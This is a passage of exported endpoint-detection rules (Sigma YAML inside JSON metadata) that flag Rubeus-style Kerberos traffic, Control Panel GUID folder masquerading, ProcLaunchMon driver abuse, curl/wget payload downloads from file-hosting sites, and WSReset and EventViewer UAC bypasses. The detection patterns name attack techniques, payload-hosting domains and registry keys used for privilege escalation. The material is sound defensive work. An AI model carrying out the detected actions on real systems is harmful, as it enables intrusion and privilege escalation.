'?:\\ProgramData\\chocolatey\\lib\\mpvio.install\\tools\\mpv.com'\n\n 
exclusion_s2eup:\n ProcessImage: '?:\\Windows\\System32\\spool\\drivers\\x64\\\\?\\SU2EUP.EXE'\n\n exclusion_eclipse:\n ProcessSigned: 'true'\n ProcessSignature: 'Eclipse.org Foundation, Inc.'\n\n exclusion_rapid7:\n ProcessImage|endswith: '\\nexserv.exe'\n ProcessCommandLine|contains: ' -className=com/rapid7/nexpose/nsc/NSC'\n\n exclusion_smartbrowser:\n ProcessOriginalFileName: 'SmartBrowser-Blink.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'OODRIVE S.A.S.'\n\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{17696EAC-9568-4CF5-BB8C-82515AAD6C09}'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dce8900d-6bdc-42c6-ab73-04731d439106",
"rule_name": "Kerberos Traffic from Unusual Process",
"rule_description": "Detects a network communication to the port 88 (Kerberos protocol) by an unusual process.\nAdversaries may use Kerberos exploitation tools such as Rubeus to communicate with Kerberos' KDC and obtain tickets on behalf of other users.\nIt is recommended to verify the legitimacy of this network connection and check the detected process for any suspicious activity.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd521d1e-6736-4777-9096-97a6d6de66c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071923Z",
"creation_date": "2026-03-23T11:45:34.071925Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071929Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications",
"https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_control_panel_process_exec.yml",
"content": "title: Process Executed from a Folder Masquerading as a Control Panel Item\nid: dd521d1e-6736-4777-9096-97a6d6de66c3\ndescription: |\n Detects a process launched from a folder whose name contains a well-known Control Panel GUID.\n Adversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\n It is recommended to check for malicious activity by the newly created process or its parent processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/shell/control-panel-applications\n - https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/10/23\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessImage|contains:\n - '.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}\\'\n - '.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\\'\n - '.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\\'\n - '.{087DA31B-0DD3-4537-8E23-64A18591F88B}\\'\n - '.{0D2A3442-5181-4E3A-9BD4-83BD10AF3D76}\\'\n - '.{0DF44EAA-FF21-4412-828E-260A8728E7F1}\\'\n - '.{1206F5F1-0569-412C-8FEC-3204630DFB70}\\'\n - '.{17cd9488-1228-4b2f-88ce-4298e93e0966}\\'\n - '.{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n - '.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\\'\n - '.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}\\'\n - '.{37efd44d-ef8d-41b1-940d-96973a50e9e0}\\'\n - '.{3e7efb4c-faf1-453d-89eb-56026875ef90}\\'\n - '.{4026492F-2F69-46B8-B9BF-5654FC07E423}\\'\n - '.{40419485-C444-4567-851A-2DD7BFA1684D}\\'\n - '.{5224F545-A443-4859-BA23-7B5A95BDC8EF}\\'\n - '.{58E3C745-D971-4081-9034-86E34B30836A}\\'\n - '.{5ea4f148-308c-46d7-98a9-49041b1dd468}\\'\n - '.{60632754-c523-4b62-b45c-4172da012619}\\'\n - 
'.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\\'\n - '.{67CA7650-96E6-4FDD-BB43-A8E774F73A57}\\'\n - '.{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\\'\n - '.{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\\'\n - '.{725BE8F7-668E-4C7B-8F90-46BDB0936430}\\'\n - '.{74246bfc-4c96-11d0-abef-0020af6b0b7a}\\'\n - '.{78CB147A-98EA-4AA6-B0DF-C8681F69341C}\\'\n - '.{78F3955E-3B90-4184-BD14-5397C15F1EFC}\\'\n - '.{7A979262-40CE-46ff-AEEE-7884AC3B6136}\\'\n - '.{7b81be6a-ce2b-4676-a29e-eb907a5126c5}\\'\n - '.{80F3F1D5-FECA-45F3-BC32-752C152E456E}\\'\n - '.{87D66A43-7B11-4A28-9811-C86EE395ACF7}\\'\n - '.{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}\\'\n - '.{8E908FC9-BECC-40f6-915B-F4CA0E70D03D}\\'\n - '.{93412589-74D4-4E4E-AD0E-E0CB621440FD}\\'\n - '.{96AE8D84-A250-4520-95A5-A47A7E3C548B}\\'\n - '.{9C60DE1E-E5FC-40f4-A487-460851A8D915}\\'\n - '.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\\'\n - '.{9FE63AFD-59CF-4419-9775-ABCC3849F861}\\'\n - '.{A0275511-0E86-4ECA-97C2-ECD8F1221D08}\\'\n - '.{A304259D-52B8-4526-8B1A-A1D6CECC8243}\\'\n - '.{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\\'\n - '.{A8A91A66-3A7D-4424-8D24-04E180695C7A}\\'\n - '.{AB3BE6AA-7561-4838-AB77-ACF8427DF426}\\'\n - '.{B2C761C6-29BC-4f19-9251-E6195265BAF1}\\'\n - '.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\\'\n - '.{BAA884F4-3432-48b8-AA72-9BF20EEF31D5}\\'\n - '.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\\'\n - '.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\\'\n - '.{BE122A0E-4503-11DA-8BDE-F66BAD1E3F3A}\\'\n - '.{BF782CC9-5A52-4A17-806C-2A894FFEEAC5}\\'\n - '.{C555438B-3C23-4769-A71F-B6D3D9B6053A}\\'\n - '.{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\\'\n - '.{CB1B7F8C-C50A-4176-B604-9E24DEE8D4D1}\\'\n - '.{D20EA4E1-3957-11d2-A40B-0C5020524153}\\'\n - '.{D450A8A1-9568-45C7-9C0E-B4F9FB4537BD}\\'\n - '.{D555645E-D4F8-4c29-A827-D93C859C4F2A}\\'\n - '.{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}\\'\n - '.{D9EF8727-CAC2-4e60-809E-86F80A666C91}\\'\n - '.{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\\'\n - '.{E95A4861-D57A-4be1-AD0F-35267E261739}\\'\n - 
'.{E9950154-C418-419e-A90A-20C5287AE24B}\\'\n - '.{ECDB0924-4208-451E-8EE0-373C0956DE16}\\'\n - '.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}\\'\n - '.{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\\'\n - '.{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\\'\n - '.{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\\'\n - '.{F942C606-0914-47AB-BE56-1321B8035096}\\'\n - '.{FCFEECAE-EE1B-4849-AE50-685DCF7717EC}\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd521d1e-6736-4777-9096-97a6d6de66c3",
"rule_name": "Process Executed from a Folder Masquerading as a Control Panel Item",
"rule_description": "Detects a process launched from a folder whose name contains a well-known Control Panel GUID.\nAdversaries may use Control Panel GUIDs to hide their payload as Explorer will open the Control Panel instead of browsing the folder.\nIt is recommended to check for malicious activity by the newly created process or its parent processes.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611052Z",
"creation_date": "2026-03-23T11:45:34.611056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/",
"https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem",
"https://learn.microsoft.com/en-us/windows-hardware/drivers/debuggercmds/time-travel-debugging-ttd-exe-command-line-util",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_proclaunchmon_load.yml",
"content": "title: TTD ProcLaunchMon Driver Loaded\nid: dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25\ndescription: |\n Detects the loading of the TTD ProcLaunchMon driver.\n ProcLaunchMon driver is a Windows built-in driver and can be used to perform TTD (Time Travel Debugging).\n TTD refers to the ability to track and keep records of the state of a running process over time.\n Adversaries may abuse this tool to disable security products by adding targeted EDR processes to the monitoring session, causing children processes to be suspended.\n This can also be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to ensure that the usage of the ProcLaunchMon is legitimate.\nreferences:\n - https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\n - https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debuggercmds/time-travel-debugging-ttd-exe-command-line-util\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/25\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection_image:\n - OriginalFileName: 'ProcLaunchMon.sys'\n - ImageLoaded|endswith: '\\ProcLaunchMon.sys'\n\n selection_signed:\n Signed: 'true'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd5c4683-1ba6-4b7e-93e0-a1c3cfedcc25",
"rule_name": "TTD ProcLaunchMon Driver Loaded",
"rule_description": "Detects the loading of the TTD ProcLaunchMon driver.\nProcLaunchMon driver is a Windows built-in driver and can be used to perform TTD (Time Travel Debugging).\nTTD refers to the ability to track and keep records of the state of a running process over time.\nAdversaries may abuse this tool to disable security products by adding targeted EDR processes to the monitoring session, causing child processes to be suspended.\nThis can also be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to ensure that the usage of ProcLaunchMon is legitimate.\n",
"rule_creation_date": "2024-07-25",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd5dc65e-22fb-4e81-88a0-3c0690c1962b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626744Z",
"creation_date": "2026-03-23T11:45:34.626746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_windows.yml",
"content": "title: File Downloaded via Curl or Wget from Suspicious URL (Windows)\nid: dd5dc65e-22fb-4e81-88a0-3c0690c1962b\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/10\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Curl\n - classification.Windows.LOLBin.Wget\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wget.exe'\n - 'curl.exe'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 'paste.c-net.org'\n\n exclusion_paloalto:\n Image: '?:\\Program Files\\Palo Alto Networks\\DEM\\bin\\curl.exe'\n CommandLine|contains: '--resolve www.dropbox.com'\n\n 
exclusion_sketchup:\n CommandLine: 'curl https://raw.githubusercontent.com/*/config/donate.url -s -o C:/Users/*/AppData/Local/Temp/uir-donate.url'\n ParentImage:\n - '?:\\Program Files\\SketchUp\\\\*\\SketchUp.exe'\n - '?:\\Program Files (x86)\\SketchUp\\\\*\\SketchUp.exe'\n\n exclusion_url:\n CommandLine|contains:\n - 'https://raw.githubusercontent.com/mon5termatt/medicat_installer/'\n - 'https://raw.githubusercontent.com/nvm-sh/nvm/'\n - 'curl -fsSL https://storage.googleapis.com/claude-code-dist-'\n\n exclusion_mingw:\n Image:\n - '?:\\Program Files\\Git\\mingw64\\bin\\curl.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\mingw64\\bin\\curl.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\PortableGit\\mingw64\\bin\\curl.exe'\n ParentImage:\n - '?:\\Program Files\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Git\\usr\\bin\\bash.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\PortableGit\\usr\\bin\\bash.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd5dc65e-22fb-4e81-88a0-3c0690c1962b",
"rule_name": "File Downloaded via Curl or Wget from Suspicious URL (Windows)",
"rule_description": "Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2023-02-10",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd6d5465-1550-421c-9598-f5e0a2813c5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077682Z",
"creation_date": "2026-03-23T11:45:34.077684Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077689Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.activecyber.us/activelabs/windows-uac-bypass",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"
],
"name": "t1548_002_prepare_uac_bypass_wsreset_reg.yml",
"content": "title: WSReset UAC Bypass Prepared via Registry\nid: dd6d5465-1550-421c-9598-f5e0a2813c5e\ndescription: |\n Detects attempts to bypass UAC through WSReset.exe by modifying a specific registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This technique exploits WSReset.exe's auto-elevated status to execute arbitrary commands with high integrity without triggering UAC prompts on Windows 10/11 systems.\n It is recommended to investigate the modified registry keys for any unauthorized changes, and validate the legitimacy of high-integrity processes spawned by WSReset.exe.\nreferences:\n - https://www.activecyber.us/activelabs/windows-uac-bypass\n - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\ndate: 2020/09/18\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store\\UserChoice\\ProgId'\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\*'\n\n filter_known_good:\n Details:\n - 'AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2'\n - 
'AppXdv25x4ndb8r51pbdf6srsknmbkfnkpaq' # Windows Store Actions\n TargetObject|contains: 'Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-windows-store\\UserChoice\\ProgId'\n Image:\n - '?:\\Windows\\System32\\OpenWith.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\mighost.exe'\n\n condition: (selection_set_value and not 1 of filter_*) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd6d5465-1550-421c-9598-f5e0a2813c5e",
"rule_name": "WSReset UAC Bypass Prepared via Registry",
"rule_description": "Detects attempts to bypass UAC through WSReset.exe by modifying a specific registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis technique exploits WSReset.exe's auto-elevated status to execute arbitrary commands with high integrity without triggering UAC prompts on Windows 10/11 systems.\nIt is recommended to investigate the modified registry keys for any unauthorized changes, and validate the legitimacy of high-integrity processes spawned by WSReset.exe.\n",
"rule_creation_date": "2020-09-18",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd8e0768-9335-472a-89fb-71efaa573368",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073918Z",
"creation_date": "2026-03-23T11:45:34.073920Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073925Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/CsEnox/EventViewer-UACBypass/blob/main/Invoke-EventViewer.ps1",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_eventviewr.yml",
"content": "title: UAC Bypass via EventViewer Prepared\nid: dd8e0768-9335-472a-89fb-71efaa573368\ndescription: |\n Detects an unusual process writing to the Event Viewer's RecentViews file.\n This file is automatically loaded and executed when the Event Viewer starts.\n Malicious actors may alter this file's contents to exploit the Event Viewer's automatic privilege elevation feature for UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process editing the file for other potentially harmful activities and to monitor eventvwr.exe for any suspicious behavior.\nreferences:\n - https://github.com/CsEnox/EventViewer-UACBypass/blob/main/Invoke-EventViewer.ps1\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - attack.t1105\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Kind:\n - 'create'\n - 'write'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Event Viewer\\RecentViews'\n - Kind: 'rename'\n TargetPath: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Event Viewer\\RecentViews'\n\n filter_mmc:\n Image:\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\syswow64\\mmc.exe'\n\n filter_svchost:\n Image: '?:\\Windows\\System32\\svchost.exe'\n\n filter_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - 
'?:\\Program Files (x86)\\'\n\n exclusion_setuphost:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n Image: '?:\\Windows\\System32\\rundll32.exe'\n ProcessCommandLine|contains: 'shsetup.dll,SHUnattendedSetup specialize'\n\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{????????-????-????-????-????????????}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_explorer:\n Image: '?:\\windows\\Explorer.EXE'\n ProcessParentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_vssvc:\n Image: '?:\\windows\\system32\\vssvc.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_transwiz:\n Image: '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n exclusion_transwiz_signed:\n ProcessDescription: 'ForensiT Transwiz'\n ProcessSigned: 'true'\n ProcessSignature: 'ForensiT Limited'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd8e0768-9335-472a-89fb-71efaa573368",
"rule_name": "UAC Bypass via EventViewer Prepared",
"rule_description": "Detects an unusual process writing to the Event Viewer's RecentViews file.\nThis file is automatically loaded and executed when the Event Viewer starts.\nMalicious actors may alter this file's contents to exploit the Event Viewer's automatic privilege elevation feature for UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process editing the file for other potentially harmful activities and to monitor eventvwr.exe for any suspicious behavior.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-05-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1204.002",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
